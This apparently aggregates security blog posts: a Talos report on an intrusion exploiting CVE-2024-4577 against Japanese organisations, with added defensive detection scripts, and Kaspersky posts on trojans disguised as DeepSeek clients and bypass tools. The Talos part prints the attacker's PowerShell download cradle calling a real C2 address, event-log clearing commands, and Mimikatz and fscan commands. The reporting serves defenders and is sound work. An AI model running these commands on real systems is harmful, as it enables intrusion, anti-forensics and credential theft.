Welcome to this week’s edition of the Threat Source newsletter.
At Talos we bat on behalf of our customers, protecting them against all manner of cyber threats that may affect them. The nature of the threat actor and their origin or affiliation makes no difference; if they are attacking or planning to attack a customer, we do our utmost to stop them.
In practice, identifying the origin of attacks can be surprisingly difficult, much harder than identifying the attack itself. Attacks do not arrive wrapped in a flag with a certificate of origin. Typically, attackers seek to hide their origin so as to avoid the attention of law enforcement or the international community. However, although identification is not an easy task, attackers often unwittingly leave clues to their identity.
We are all creatures of habit; we all have our preferred methods of doing things, tools that we are familiar with, or suppliers that we often choose over another. Threat actors are no different. Over time, the choices made by a threat actor in how they carry out their attacks, the methods they use, and their choice of victims builds to become a characteristic fingerprint.
New attacks can be analysed to identify if their characteristics overlap with those of a known threat actor. If so, we may surmise that the attack has been carried out by that threat actor. Nevertheless, uncovering and understanding the relationship between an attack and the threat actor behind the attack requires detailed research or possibly will only become apparent with the passage of time and the publication of additional information.
Even if an attack can be attributed to a known threat actor, the nature and origin of that threat actor may be obscure. Threat actors rarely admit to their actions and volunteer their identity. A detailed investigation by law enforcement or intelligence agencies may identify an attacker’s identity. Otherwise the security industry refers to known threat actors by various pseudonyms, few of which are definitively tied to one or more named individuals or an organisation. Understanding and communicating degrees of uncertainty when it comes to describing threat actors is a key skill in the threat intelligence community.
Suffice to say that we do not pick and choose the threats that we block. We block them regardless of their origin because this is who we are and what we do, and in any case, identifying the origin of a threat is not a simple matter.
The one big thing
Lotus Blossom is a sophisticated threat actor that we’ve uncovered conducting espionage campaigns against the government, manufacturing, telecoms, and media sectors in Vietnam, Hong Kong, Taiwan, and the Philippines. As part of this activity, the threat actor uses the Sagerunex family of backdoor malware for command and control activity.
Why do I care?
Understanding how threat actors such as Lotus Blossom conduct their operations helps inform organisations about the defenses that are required to protect against this and similar threats. Even if you are not working within one of the affected industry sectors, other threat actors may be conducting information-stealing campaigns against you.
So now what?
Use the IOCs associated with the campaign to search for evidence of incursion within your own organization. Use this exercise as a means of verifying that you have visibility of the systems on your network and that you are able to search for known malicious IOCs.
Top security headlines of the week
244 million additional compromised passwords from a data dump offered for sale by criminals have been added to the privacy breach notification service “Have I Been Pwned”. (The Register)
A massive botnet consisting of more than 86,000 compromised IoT devices is conducting DDoS attacks against telecom firms and gaming platforms. (Cybersecurity Dive)
The US agency CISA reports that it will continue to defend against threats, including those from Russia. (TheRecord)
Can’t get enough Talos?
In The Talos Threat Perspective episode 9, Hazel Burton speaks with Nick Biasini about changes in social engineering techniques.
Upcoming events where you can find Talos
RSA (April 28 – May 1, 2025), San Francisco, CA
CTA TIPS 2025 (May 14 – 15, 2025), Arlington, VA
Cisco Live U.S. (June 8 – 12, 2025), San Diego, CA
Most prevalent malware files from Talos telemetry over the past week
Who is Responsible and Does it Matter? (admin, 2025-03-06 19:06:51)
Cisco Talos discovered malicious activities conducted by an unknown attacker since as early as January 2025, predominantly targeting organizations in Japan.
The attacker has exploited the vulnerability CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation of PHP on Windows, to gain initial access to victim machines.
The attacker utilizes plugins of the publicly available Cobalt Strike kit “TaoWu” for post-exploitation activities.
Talos found a pre-configured installer script on the command and control (C2) server that deploys a full suite of adversarial tools and frameworks hosted on an Alibaba Cloud Container Registry, highlighting the potential misuse of such tools for malicious purposes by the attacker.
Talos noticed the attacker’s attempt at stealing the victim’s machine credentials. However, we assess with moderate confidence that the attacker’s motive extends beyond just credential harvesting, based on our observation of other post-exploitation activities, such as establishing persistence, elevating to SYSTEM level privilege, and potential access to adversarial frameworks, indicating the likelihood of future attacks.
We reported an increasing trend of threat actors exploiting vulnerable public facing applications for initial access in our quarterly Talos Incident Response (Talos IR) report for Q4 2024, and the discovery of this intrusion highlights this ongoing activity.
Victimology
We found that the attacker predominantly targets organizations in Japan across various business verticals, including technology, telecommunications, entertainment, education, and e-commerce, based on our analysis of command and control (C2) server artefacts.
Attack overview
The attacker attempts to compromise the victim machine using an exploit program targeting the vulnerability CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation of PHP on Windows. In the event of successful exploitation, the attacker executes a PowerShell script to run Cobalt Strike reverse HTTP shellcode, ensuring remote access to the victim machine.
Then, they begin reconnaissance by gathering system details and user privileges. They execute privilege escalation exploit programs, such as JuicyPotato, RottenPotato, and SweetPotato, to gain SYSTEM-level access. They establish persistence by modifying registry keys, adding scheduled tasks, and creating malicious services using the plugins of the Cobalt Strike kit called “TaoWu.”
To maintain stealth, they erase event logs using wevtutil commands, removing traces of their actions from the Windows security, system, and application logs. They further perform network reconnaissance using “fscan.exe” and “Seatbelt.exe” to map out potential lateral movement targets. The attacker has also attempted to abuse Group Policy Objects using “SharpGPOAbuse.exe” to execute malicious PowerShell scripts across the network. Eventually, they execute Mimikatz commands to dump and exfiltrate passwords and NTLM hashes from memory on the victim’s machine.
Initial access
Talos discovered that the attacker gains initial access to the victim’s network by exploiting the vulnerability CVE-2024-4577.
CVE-2024-4577 is a critical remote code execution (RCE) vulnerability in Windows-based PHP installations using CGI configurations. It arises from the “Best-Fit” behavior in Windows code pages, where certain characters are replaced in command-line inputs. The flaw in the PHP-CGI module misinterprets these characters as PHP options, allowing attackers to execute arbitrary PHP code on the server when using Apache with a vulnerable PHP-CGI setup.
To target the vulnerability, the attacker leverages a publicly available exploit Python script, “PHP-CGI_CVE-2024-4577_RCE.py”. The script checks whether a specific URL is vulnerable to CVE-2024-4577 by sending a specifically crafted POST request to the target URL with PHP code designed to trigger the vulnerability. If the response contains the MD5 hash “e10adc3949ba59abbe56e057f20f883e”, exploitation was successful. The script then prompts the user to input commands as PHP code, which are executed on the vulnerable server, and displays the response to the attacker.
Snippet of the CVE-2024-4577 exploit script.
In this intrusion, we found that the attacker has executed an embedded PowerShell command in the PHP code to trigger the infection.
<?php system ('powershell -c "Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http[://]38[.]14[.]255[.]23[:]8000/payload[.]ps1')"');?>
The attacker triggers the infection by executing the PowerShell command through the PHP code, leading to the download and execution of a PowerShell injector script from the C2 server on the victim machine memory.
The PowerShell injector script is embedded with either a base64-encoded or a hexadecimal data blob containing the Cobalt Strike reverse HTTP shellcode. Upon execution, it injects and executes the shellcode in the victim machine’s memory; the shellcode connects over HTTP to the Cobalt Strike server running on the C2 server, enabling remote access to the victim machine.
Sample PowerShell injector script.
The shellcode connects to the C2 server 38[.]14[.]255[.]23 over HTTP on port 8077 using the URL paths “/6Qeq” or “/jANd”. The attacker used one of the following two User-Agent headers.
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; LEN2)
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; BOIE9; ENUS)
Snippet of the Cobalt Strike reverse HTTP shellcode.
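The initial-access chain above leaves two kinds of evidence a defender can hunt for: a PowerShell download cradle spawned by the PHP-CGI process, and beacon traffic to the C2 address, URI paths and User-Agent strings listed in the post. The script below is an added example (not Talos tooling) that runs those checks over constructed process-creation and proxy log records; the log formats and sample entries are assumptions made for illustration.

```python
"""Hunt for the initial-access artefacts described in the post: a PowerShell
download cradle launched from php-cgi.exe, and HTTP traffic to the C2 indicators.
Added example, not Talos code. Log formats and sample records are constructed."""
import re
from dataclasses import dataclass

# Indicators taken from the post (defanging removed so they match raw logs).
C2_HOST = "38.14.255.23"
C2_PORTS = {"8000", "8077"}          # 8000 staged payload.ps1, 8077 beacon traffic
C2_PATHS = {"/6Qeq", "/jANd", "/payload.ps1"}
C2_USER_AGENTS = {
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; LEN2)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; BOIE9; ENUS)",
}

# Download cradle: Invoke-Expression/IEX combined with WebClient.DownloadString.
CRADLE_RE = re.compile(
    r"(Invoke-Expression|\bIEX\b).*DownloadString\(|DownloadString\(.*(Invoke-Expression|\bIEX\b)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    source: str   # "process" or "proxy"
    reason: str
    record: str


def scan_process_events(events):
    """events: iterable of (parent_image, image, command_line) tuples, as exported
    from Sysmon Event ID 1 or Security 4688 (assumed shape)."""
    findings = []
    for parent, image, cmdline in events:
        reasons = []
        if image.lower().endswith("powershell.exe") and CRADLE_RE.search(cmdline):
            reasons.append("powershell download cradle")
        if parent.lower().endswith("php-cgi.exe") and image.lower().endswith(("powershell.exe", "cmd.exe")):
            reasons.append("shell spawned by php-cgi")
        if C2_HOST in cmdline:
            reasons.append("known C2 address in command line")
        findings.extend(Finding("process", r, cmdline) for r in reasons)
    return findings


def scan_proxy_log(lines):
    """lines: constructed 'client dst_host dst_port method path "user-agent"' records."""
    findings = []
    for line in lines:
        m = re.match(r'(\S+) (\S+) (\d+) (\S+) (\S+) "([^"]*)"', line)
        if not m:
            continue
        _, host, port, _, path, ua = m.groups()
        if host == C2_HOST and port in C2_PORTS:
            findings.append(Finding("proxy", "connection to known C2 host:port", line))
        if ua in C2_USER_AGENTS and path in C2_PATHS:
            findings.append(Finding("proxy", "beacon user-agent and URI path", line))
    return findings


# Constructed sample records (not real telemetry).
SAMPLE_PROCESS_EVENTS = [
    ("httpd.exe", "php-cgi.exe", "php-cgi.exe"),
    ("php-cgi.exe", "powershell.exe",
     'powershell -c "Invoke-Expression (New-Object System.Net.WebClient)'
     '.DownloadString(\'http://38.14.255.23:8000/payload.ps1\')"'),
    ("explorer.exe", "powershell.exe", "powershell -NoProfile Get-Process"),
]
SAMPLE_PROXY_LINES = [
    '10.0.0.5 38.14.255.23 8077 GET /6Qeq "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; LEN2)"',
    '10.0.0.5 203.0.113.10 443 GET /index.html "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
]

if __name__ == "__main__":
    for f in scan_process_events(SAMPLE_PROCESS_EVENTS) + scan_proxy_log(SAMPLE_PROXY_LINES):
        print(f"[{f.source}] {f.reason}: {f.record}")
```

The parent-child rule (php-cgi.exe spawning a shell) is the most durable of the three checks: the C2 address and User-Agent strings are specific to this intrusion and will change, whereas a CGI worker launching PowerShell should not happen on a healthy web server.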
Post-exploitation activities
After gaining remote access to the victim machine through Cobalt Strike reverse HTTP shellcode, the attacker remotely executes commands on the victim machine from the Cobalt Strike server that is configured with plugins from the “TaoWu” Cobalt Strike kit (hxxps[://]github[.]com/pandasec888/taowu-cobalt_strike) to perform the post-exploitation tasks.
Below are the post-exploitation commands that we observed in this attack, mapped to the MITRE ATT&CK framework.
The attacker gathers the victim’s system and user information and also checks the time synchronization by remotely executing the following commands on the victim machine.
The attacker attempts to elevate the user privileges by executing privilege escalation exploits, including JuicyPotato, RottenPotato, and SweetPotato. These Potato exploits abuse the Windows method of handling authentication and impersonation tokens to escalate privileges from a low-privileged user to SYSTEM user.
Microsoft has already patched the flaws that these exploits target in Windows 10 and Windows Server 2012, 2016, and 2019, as well as in the latest versions. However, if a Windows process runs with the “SeImpersonatePrivilege” right enabled, which allows the process to impersonate another user’s security token, it can still be abused for privilege escalation using JuicyPotato, SweetPotato, and RottenPotato.
The attacker uses Ladon[.]exe, a plugin of the “TaoWu” Cobalt Strike kit, to bypass User Account Control (UAC) on the victim machine.
The attacker leverages the “reg add” command and other .NET plugins of the TaoWu Cobalt Strike kit to modify the registry keys and create the Windows scheduled tasks to establish persistence on the victim machine.
The attacker executes the “reg add” command to add the path of the beacon executable to the Run registry key.
The attacker erases evidence of their activity on the victim machine by clearing the Windows event logs on the compromised endpoint using the living-off-the-land binary (LoLBin) “wevtutil.exe”.
wevtutil cl security
wevtutil cl system
wevtutil cl application
wevtutil cl windows powershell
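The persistence and anti-forensics steps above (adding the beacon path to the Run key, creating scheduled tasks, and clearing event logs with wevtutil) each leave a detectable trace: the command lines themselves in process-creation telemetry, and, for log clearing, the audit events Windows writes when a log is cleared (Security event ID 1102; System event ID 104). The detector below is an added example, not Talos code; the event records are constructed to resemble Sysmon and Windows audit events, and the field names are assumptions.

```python
"""Detect Run-key persistence, scheduled-task creation and event-log clearing
as described in the post. Added example, not Talos code. Event records are
constructed; field names ('channel', 'event_id', 'command_line') are assumed."""
import re
from typing import Iterable

# Audit events written when a log is cleared: Security 1102, System (and others) 104.
LOG_CLEARED_EVENT_IDS = {("Security", 1102), ("System", 104)}

WEVTUTIL_CLEAR_RE = re.compile(r'^("?[^"]*\\)?wevtutil(\.exe)?"?\s+(cl|clear-log)\b')
SCHTASKS_CREATE_RE = re.compile(r'^("?[^"]*\\)?schtasks(\.exe)?"?\s+/create\b')
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.IGNORECASE)


def classify_command(cmdline: str):
    """Return ATT&CK-labelled technique names matched by one process command line."""
    c = cmdline.strip()
    lower = c.lower()
    labels = []
    if WEVTUTIL_CLEAR_RE.match(lower):
        labels.append("T1070.001 event log cleared via wevtutil")
    if lower.startswith(("reg ", "reg.exe ")) and " add " in lower and RUN_KEY_RE.search(c):
        labels.append("T1547.001 Run key persistence via reg add")
    if SCHTASKS_CREATE_RE.match(lower):
        labels.append("T1053.005 scheduled task created")
    return labels


def detect(events: Iterable[dict]):
    """Return (label, event) pairs for every event that matches a rule."""
    alerts = []
    for ev in events:
        if (ev.get("channel"), ev.get("event_id")) in LOG_CLEARED_EVENT_IDS:
            alerts.append(("T1070.001 log cleared (audit event)", ev))
        cmd = ev.get("command_line")
        if cmd:
            alerts.extend((label, ev) for label in classify_command(cmd))
    return alerts


# Constructed sample events (not real telemetry). Paths and task names are placeholders.
SYSMON = "Microsoft-Windows-Sysmon/Operational"
SAMPLE_EVENTS = [
    {"channel": SYSMON, "event_id": 1, "command_line": "wevtutil cl security"},
    {"channel": SYSMON, "event_id": 1, "command_line": 'wevtutil cl "windows powershell"'},
    {"channel": "Security", "event_id": 1102},
    {"channel": SYSMON, "event_id": 1, "command_line":
        r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svc /t REG_SZ /d C:\Windows\Temp\beacon.exe"},
    {"channel": SYSMON, "event_id": 1, "command_line": "schtasks /create /tn update /tr powershell.exe /sc onlogon"},
    {"channel": SYSMON, "event_id": 1, "command_line": "wevtutil qe Security /c:5"},  # benign query, no alert
]

if __name__ == "__main__":
    for label, ev in detect(SAMPLE_EVENTS):
        print(label, "<-", ev.get("command_line") or f"{ev['channel']} {ev['event_id']}")
```

The 1102/104 audit events matter because they survive the clearing itself: they are the first entries written to the freshly emptied log, so a forwarded copy of those events is evidence even when the command line was never captured.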
The attacker uses fscan.exe, an open-source network scanning utility, and Seatbelt, a tool that collects detailed information about a system (such as remote access configurations, network shares, and other security-relevant data on the victim machine) to perform network reconnaissance and lateral movement in the victim network.
The attacker uploads the utility “fscan.exe” from the C2 server to the “C:\Windows\Temp” directory on the victim machine.
upload /"C2 server path"/fscan.exe
The attacker runs the .NET program “Seatbelt.exe” to gather the remote access-related information of the victim machine.
Seatbelt.exe -group=Remote -full
The attacker runs “SharpGPOAbuse.exe”, a tool used to abuse group policy objects (GPOs) for malicious purposes. The attacker creates a scheduled task via GPO named “update” that runs a PowerShell command across the network, which downloads and executes the attacker’s PowerShell payload.
The attacker runs “fscan” to scan the local subnet of the victim’s network with a range of 256 IP addresses to discover other machines, ports, and services in the sub-network.
fscan.exe -h 192[.]168[.]1[.]1/24
The attacker uses fscan to locate SSH services, automating SSH login attempts by supplying a public key (id_rsa.pub) to gain unauthorized access to SSH-enabled machines. They also attempt to brute-force SSH credentials for services running on a non-default port (2222).
Using the fscan utility, the attacker opens a reverse shell, enabling the attacker to execute commands on victim machines in the subnet while connecting back to their server on port 6666, and executes the “whoami” command on the accessible machines.
The attacker executes Mimikatz commands to gather plaintext passwords and NTLM hashes from memory on the victim’s machine.
sekurlsa::logonpasswords
Attacker’s tradecraft has similarities with a hacker group
We observed the attacker exploiting the weakness in the vulnerable systems to gain initial access and execute Cobalt Strike reverse HTTP beacons to have continued remote access to the victim machine. They have used the Cobalt Strike kit “TaoWu” that has several plugins, including sharpTask.exe, SharpHide.exe, SharpStay.exe, Ladon.exe, and fscan, and Mimikatz for post-exploitation activities.
Similar techniques were previously observed being used by the hacker group called “Dark Cloud Shield” or “You Dun” in their attacks in 2024, as reported by the DFIR Report.
However, we are not attributing the attacks to the “You Dun” group, as we did not observe any further activities after harvesting the victim machine credentials in the current intrusion.
Potential abuse of adversarial tools and frameworks
We discovered that the attacker used two C2 servers with IP addresses 38[.]14[.]255[.]23 and 118[.]31[.]18[.]77, hosted on Alibaba Cloud and running the Cobalt Strike team server. During our research period, we noticed from OSINT artefacts that the attacker had left directory listing enabled on the root folder of the C2 server 38[.]14[.]255[.]23, exposing its contents to the internet.
We found PowerShell scripts, Cobalt Strike beacon executables, and exploit programs along with the attacker’s command execution history logs in the C2 server’s exposed folder. Our further analysis of the contents of the exposed folder showed that the attacker had downloaded and executed a pre-configured installer shell script called “LinuxEnvConfig.sh” from the repository “yijingsec” on the Gitee platform (hxxps[://]gitee[.]com/yijingsec/), a Chinese Git-based platform similar to GitHub. The author describes the repository as belonging to a network security talent training service provider called “Yijing Network Security Academy,” which indicates that the attacker is likely abusing a legitimate resource for malicious purposes.
The shell script “LinuxEnvConfig.sh” appears to be designed to configure foundational environments for Ubuntu, Debian, and Kali Linux systems and to facilitate the setup of various publicly available offensive security frameworks and tools, including Vulfocus, Asset Reconnaissance Lighthouse (ARL), Viper C2, Starkiller, BeEF, and Blue-Lotus, which are packaged and staged as Docker containers in the container registry “registry[.]cn-shanghai[.]aliyuncs[.]com”, an Alibaba Cloud Container Registry (ACR) located in the Shanghai, China, region.
We also found that the shellscript, when executed by a user, modifies the machine’s DNS settings, pointing to a specific DNS server with the IP address 114[.]114[.]114[.]114, which is a Chinese 114DNS service and is not used very often in other regions.
Menu-driven interface of the LinuxEnvConfig.
We have continued to see various threat actors abusing publicly available tools, such as Cobalt Strike, Metasploit, ARL, Vulfocus, and PowerShell Empire, for malicious purposes. However, some of the tools and frameworks that the shell script “LinuxEnvConfig” deploys, such as Blue-Lotus, BeEF, and Viper C2, are not often seen in attackers’ possession, so we document them further in this blog post to provide an overview of the capabilities and functionalities that an attacker could leverage by abusing such tools.
Blue-Lotus
Blue-Lotus is a JavaScript webshell cross-site scripting attack framework. Blue-Lotus is Docker-based and was developed by Firesun[.]me and the Blue Lotus team, a cybersecurity technology competition and research team from Tsinghua University.
Blue-Lotus’ administrative panel is in Chinese, with an XSS receiving dashboard that displays the connection details of the victim machine, including the IP address and browser.
Blue-Lotus tool control panel.
Blue-Lotus has a payload generation panel where the user can generate the JavaScript webshell payload using the default JavaScript template from the tool’s database. An attacker using the framework can generate the webshell and use it in their attacks to perform the following tasks:
Cross-site scripting (XSS).
Screen capture of remote machine.
Get the reverse shell access to the remote machine.
Steal the browser cookies.
Creation of user ID and passwords in the Content Management System (CMS).
Blue-Lotus payload generation panel.
BeEF
BeEF is a publicly available browser exploitation framework that an attacker can hook into one or more web browsers on the victim machine and use to execute commands within the browser context. BeEF has command modules consisting of JavaScript code that perform the following tasks:
Check if the links, forms, and URI paths of the web page in a hooked browser are vulnerable to XSS.
Submit arbitrary requests on behalf of the hooked browser.
Interact with the host on the local network of the hooked browser.
Send commands to the victim systems through Web Real-Time Communication (WebRTC) caller.
BeEF tool dashboard.
Viper C2
Viper C2 is a modular framework with multiple plugins and scripts that define its extensive functionality. The C2 has built-in integration with the Metasploit Framework (MSF) Meterpreter console and scripts.
Viper C2 has functionalities, such as:
Antivirus software bypass.
Intranet tunnel.
File management on the remote machine, such as uploading and executing other executable files.
Remote command execution on the compromised host.
Generation of Meterpreter reverse shell payloads in multiple forms that work on Windows, Linux, and macOS.
Display the network topology of the compromised network.
Viper C2 control panel.
Viper C2 can generate Meterpreter HTTP and TCP reverse shell payloads for multiple platforms, including Windows, Linux, macOS, Android, Java, and Python. The payloads can be generated in different formats, such as EXE, DLL, ELF, ELF-SO, MSBuild, Mach-O, PowerShell script, PowerShell command, Python script, and HTA and VBA scripts.
Viper C2 payload generation panel.
Generated payloads are delivered to victims using the Viper C2 web delivery commands, which the user can generate along with the delivery URL and use in their attacks.
Viper C2 web delivery panel.
We compiled some of the command formats generated by Viper C2 to assist defenders and threat hunters in hunting for Viper C2-related activity, shown below:
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Snort SIDs for this threat:
Snort 2: 64632, 64633, 64630, 64631.
Snort 3: 301157, 301156.
Indicators of Compromise
IOCs for this threat can be found in our GitHub repository here.
Unmasking the new persistent attacks on Japan (admin, 2025-03-06 11:07:29)
We’ve discovered several groups of sites mimicking the official chatbot website and distributing malicious code under the guise of what appears to be a legitimate client. To find out exactly how these cybervillains operate, and how to use AI safely, read on…
Malicious scripts and geofencing
Several malware distribution schemes were detected, all of which had the use of fake DeepSeek websites as the common denominator. The difference lies in what was distributed through these sites and how. This post thoroughly explores one of these schemes; for details on the others, see our full report on Securelist.
What would you think if you landed on a website with the domain deepseek-pc-ai[.]com or deepseek-ai-soft[.]com? You’d probably assume you could find there some DeepSeek-related software. And what kind of software might that be? A DeepSeek client, of course! And indeed, you’ll quickly see the bright Download and slightly duller Start Now buttons that greet visitors to the site.
Fake DeepSeek web page
Whichever of these buttons you click, an installer starts downloading. But there’s a catch: once initiated, instead of installing DeepSeek, the installer accesses malicious URLs, and manipulates scripts to activate the SSH service in Windows to configure it to work with the attackers’ keys. This enables them to remotely connect to the victim’s computer, who doesn’t even get a DeepSeek Windows client as consolation… which, by the way, doesn’t exist.
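Because the installer's end goal is an SSH service trusting the attackers' keys, the durable check on a Windows host is whether any key in the OpenSSH for Windows administrators key file (`C:\ProgramData\ssh\administrators_authorized_keys`) is not one the organisation issued. The audit script below is an added example, not Kaspersky code: it parses the file in authorized_keys format, computes OpenSSH-style SHA256 fingerprints, and reports entries missing from an approved list. The key material embedded in it is constructed placeholder bytes, not real keys.

```python
"""Audit an OpenSSH administrators_authorized_keys file for keys that are not on
an approved list. Added example, not Kaspersky code. Sample keys are constructed
placeholders (valid wire format, not real public keys)."""
import base64
import hashlib
import struct


def build_key_blob(key_type: str, key_bytes: bytes) -> str:
    """Base64 of an OpenSSH wire-format blob (length-prefixed type, then key bytes).
    Used here only to construct sample entries."""
    blob = (struct.pack(">I", len(key_type)) + key_type.encode()
            + struct.pack(">I", len(key_bytes)) + key_bytes)
    return base64.b64encode(blob).decode()


def fingerprint(b64_blob: str) -> str:
    """OpenSSH-style fingerprint: 'SHA256:' + unpadded base64 of sha256(decoded blob)."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str):
    """Yield (key_type, fingerprint, comment) per valid key line. Blank lines, comments,
    undecodable blobs and blobs whose embedded type disagrees with the declared type are skipped."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        # authorized_keys lines may carry options before the key type; find the type field.
        idx = next((i for i, p in enumerate(parts) if p.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(parts):
            continue
        key_type, blob = parts[idx], parts[idx + 1]
        comment = " ".join(parts[idx + 2:])
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        tlen = struct.unpack(">I", raw[:4])[0] if len(raw) >= 4 else -1
        if raw[4:4 + tlen].decode(errors="replace") != key_type:
            continue
        yield key_type, fingerprint(blob), comment


def audit(text: str, approved_fingerprints: set):
    """Return the entries whose fingerprint is not on the approved list."""
    return [e for e in parse_authorized_keys(text) if e[1] not in approved_fingerprints]


# Constructed sample: one issued key, one unexpected key, one garbage line.
KNOWN_ADMIN_KEY = build_key_blob("ssh-ed25519", b"\x01" * 32)
UNEXPECTED_KEY = build_key_blob("ssh-ed25519", b"\x02" * 32)
SAMPLE_FILE = (
    "# constructed copy of C:\\ProgramData\\ssh\\administrators_authorized_keys\n"
    f"ssh-ed25519 {KNOWN_ADMIN_KEY} admin@corp-laptop\n"
    f"ssh-ed25519 {UNEXPECTED_KEY}\n"
    "ssh-rsa not-base64!! garbage\n"
)
APPROVED = {fingerprint(KNOWN_ADMIN_KEY)}

if __name__ == "__main__":
    for key_type, fp, comment in audit(SAMPLE_FILE, APPROVED):
        print(f"UNAPPROVED {key_type} {fp} comment={comment!r}")
```

On a real host, read the file from the path above and populate the approved set from your key inventory; the fingerprints match what `ssh-keygen -lf` prints, so the inventory can be built with standard tooling. A second, cheaper signal from the same post is the sshd service itself: on a workstation that was never meant to run OpenSSH Server, the service existing and being set to start automatically is suspicious regardless of the key file's contents.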
Interestingly, the fake sites use geofencing — restricting access based on the region of the IP address. For example, users from Russia on these domains saw a simple stub site with empty texts about DeepSeek — most likely generated by DeepSeek itself or a different large language model. Visitors from other countries, however, were taken to the malicious site distributing the fake client.
A million views on X
The main vector for distributing links to the malicious URLs was posts on the social network X (formerly Twitter). One of the most popular posts (now deleted) was published from the account of Australian startup Lumina Vista, which, open sources say, has no more than 10 employees. The company’s account itself is in its infancy: it only got the coveted blue check-mark in February 2025, and boasts just a dozen posts and fewer than 100 subscribers. Yet the post promoting the fake DeepSeek site garnered 1.2 million views and more than 100 reposts. Bit fishy? We investigated the accounts that reposted it and concluded that they could be bots, since all use the same naming convention and identifiers in the bio section. Incidentally, it’s quite possible that Lumina Vista’s account was simply hacked and used for paid promotion of the attackers’ ad post.
1.2 million views in a near-empty account? Smells like paid promotion
In the comments, some users pointed out that the link leads to a malicious site, but they were in the minority — the rest were simply expressing views about DeepSeek, Grok, and ChatGPT. However, none of the commenters noted the obvious: DeepSeek has no native client for Windows, and you can only access it in a browser. You can also run DeepSeek locally but that requires specialized software.
How to use AI safely
At present, it’s not easy to assess the scale of this and other malicious schemes involving fake DeepSeek pages. But one thing is for certain: these campaigns are massive and not targeted at specific users. Yet they’re developing very quickly: soon after the announcement of Grok-3, attackers began offering to download its client both from the domain v3-grok[.]com, and from… v3-deepseek[.]com! Indeed, Grok, DeepSeek – what’s the difference?…
Without reliable protection, any AI enthusiast is at risk. That’s why it’s vital to follow the safety rules and recommendations when using AI.
Filter sensitive data. Remember that what you write to a chatbot could be used against you: as with other cloud services, data can leak due to security flaws or account hacking.
Limit the use of third-party plugins. Every add-on app creates new threats. Special monitoring is required for execution plug-ins that can, for example, run malicious code to buy a plane ticket at your expense.
If you’re seriously interested in neural networks and want to learn how to use them safely, check out these posts:
Attackers distributing Trojans disguised as DeepSeek or Grok clients for Windows | Kaspersky official blog (admin, 2025-03-06 10:06:45)
Over the past six months, Windows Packet Divert drivers for intercepting and modifying network traffic on Windows systems have become popular in Russia. From August to January 2024, we noted that detections of these drivers almost doubled. The main reason? These drivers are being used in tools designed to bypass restrictions for accessing foreign resources.
This surge in popularity hasn’t gone unnoticed by cybercriminals. They’re actively distributing malware disguised as bypassing tools — and they’re doing it by blackmailing bloggers. So, every time you watch a video titled something like “How to bypass restrictions…”, be especially cautious — even the most reputable content creators might unknowingly be spreading stealers, miners, and other malware.
How cybercriminals exploit unsuspecting users, and where bloggers fit into the picture, is what we’ll explore in this article.
Hackers disguised as honest developers
There are plenty of software solutions designed to bypass restricted access to foreign platforms, but they all have one thing in common — they’re created by small-time developers. Such programs spread organically: an enthusiast writes some code, shares it with friends, makes a video about it, and voilà — yesterday’s unknown programmer becomes a “people’s hero”. His GitHub repository is starred tens of thousands of times, and people thank him for restoring access to their favorite online resources. We recently wrote about one such case where cybercriminals boosted GitHub repositories containing malware.
There may be dozens or even hundreds of such enthusiasts — but who are they, and can they be trusted? These are key questions both current and potential users of these programs should be asking. A major red flag is when these developers recommend disabling antivirus protection. Disabling protection to voluntarily give a potential hacker access to your device? That’s a risky move.
Of course, behind the mask of a people’s hero might be a hacker looking for profit. An unprotected device is vulnerable to malware families like NJRat, XWorm, Phemedrone, and DCRat, which have been commonly spread alongside such bypassing software.
Where do bloggers fit in?
We’ve identified an active miner distribution campaign that has claimed at least two thousand victims in Russia. One of the infection sources was a YouTube channel with 60,000 subscribers. The blogger uploaded several videos on bypassing restrictions, with a link to a malicious archive in the description. These videos accumulated over 400,000 views in total. Later, the channel owner deleted the link, leaving this note: “Download the file here: (program does not work)”. Originally, the link led to the fraudulent site gitrok[.]com, where the infected archive was hosted. According to the site’s counter, at the time of our study the bypassing tool had been downloaded at least 40,000 times.
